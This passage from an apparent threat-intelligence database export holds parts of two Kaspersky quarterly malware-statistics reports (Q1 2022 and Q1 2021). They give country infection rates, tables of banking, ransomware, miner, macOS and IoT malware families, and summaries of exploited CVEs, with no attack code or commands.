Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year&#x27;s trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we&#x27;ve often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan&#x27;s task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or 